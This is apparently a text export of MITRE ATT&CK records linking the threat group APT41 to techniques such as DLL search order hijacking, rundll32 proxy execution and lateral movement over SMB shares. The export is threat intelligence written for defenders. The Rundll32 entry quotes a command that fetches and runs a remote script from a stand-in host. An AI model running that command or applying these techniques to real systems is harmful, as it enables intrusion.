mitre/APT41.txt

type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has added user accounts to the User and Admin groups.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--373f6762-cda6-4ce7-894f-cac31a09a98b
revoked : False
technique : Account Manipulation
technique_description : Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1098
matrix : mitre-attack
platform : ['Windows', 'Azure AD', 'Office 365', 'IaaS', 'Linux', 'macOS', 'Google Workspace', 'SaaS', 'Network', 'Containers']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Active Directory: Active Directory Object Modification', 'File: File Modification', 'Group: Group Modification', 'User Account: User Account Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [pwdump](https://attack.mitre.org/software/S0006), [PowerSploit](https://attack.mitre.org/software/S0194), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--35f5f7b9-8b86-4390-9f99-1d56aa1ae32a
revoked : False
technique : Tool
technique_description : Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1588.002
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Malware Repository: Malware Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has uploaded files and data from a compromised host.(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--54f6c1c8-f3c7-44a6-9a00-2195e03cf0ae
revoked : False
technique : Data from Local System
technique_description : Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Process: OS API Execution', 'Script: Script Execution', 'Command: Command Execution', 'Process: Process Creation', 'File: File Access']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has created services to appear as benign system tools.(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--fce88056-31db-43be-be76-fb1aaf076ed1
revoked : False
technique : Masquerade Task or Service
technique_description : Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.004
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS']
data_sources : ['Scheduled Job: Scheduled Job Modification', 'Service: Service Creation', 'Command: Command Execution', 'Service: Service Metadata', 'Scheduled Job: Scheduled Job Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--898211c4-915c-469f-be47-321d2d44af90
revoked : False
technique : Rundll32
technique_description : Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.011
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Metadata', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06
revoked : False
technique : DLL Search Order Hijacking
technique_description : Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Module: Module Load', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has transferred implant files using Windows Admin Shares.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--39808511-28ac-4cff-b6b4-49d996855e8a
revoked : False
technique : SMB/Windows Admin Shares
technique_description : Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1021.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Share: Network Share Access', 'Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Creation', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
